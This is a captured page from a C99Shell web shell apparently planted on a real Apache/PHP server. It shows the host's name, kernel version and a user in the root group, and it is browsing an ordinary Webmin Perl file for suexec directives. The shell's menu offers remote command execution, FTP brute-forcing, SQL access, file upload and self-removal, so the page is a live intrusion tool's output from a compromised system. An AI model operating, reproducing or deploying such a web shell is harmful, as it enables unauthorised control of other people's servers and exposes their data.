!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/apache/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     mod_suexec.pl (1.26 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
# mod_suexec.pl
# Editors for per-virtuser suexec directives

sub mod_suexec_directives
{
local $rv;
$rv = [ [ 'SuexecUserGroup', 0, 8, 'virtual', 2.0 ] ];
return &make_directives($rv, $_[0], "mod_suexec");
}

sub edit_SuexecUserGroup
{
local $rv;
$rv .= sprintf "<input type=radio name=SuexecUserGroup_def value=1 %s> %s\n",
        $_[0] ? "" : "checked", $text{'suexec_none'};
$rv .= &ui_newline();
$rv .= sprintf "<input type=radio name=SuexecUserGroup_def value=0 %s>\n",
        $_[0] ? "checked" : "";
$rv .= sprintf "%s <input name=SuexecUserGroup_u size=8 value='%s'> %s\n",
        $text{'suexec_user'}, $_[0]->{'words'}->[0],
        &user_chooser_button("SuexecUserGroup_u");
$rv .= sprintf "%s <input name=SuexecUserGroup_g size=8 value='%s'> %s\n",
        $text{'suexec_group'}, $_[0]->{'words'}->[1],
        &group_chooser_button("SuexecUserGroup_g");
return (2, $text{'suexec_su'}, $rv);
}
sub save_SuexecUserGroup
{
if ($in{'SuexecUserGroup_def'}) {
    return ( [ ] );
    }
else {
    $in{'SuexecUserGroup_u'} =~ /^#-?\d+$/ ||
        defined(getpwnam($in{'SuexecUserGroup_u'})) ||
            &error($text{'suexec_euser'});
    $in{'SuexecUserGroup_g'} =~ /^#-?\d+$/ ||
        defined(getgrnam($in{'SuexecUserGroup_g'})) ||
            &error($text{'suexec_egroup'});
    return ( [ $in{'SuexecUserGroup_u'}." ".$in{'SuexecUserGroup_g'} ] );
    }
}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--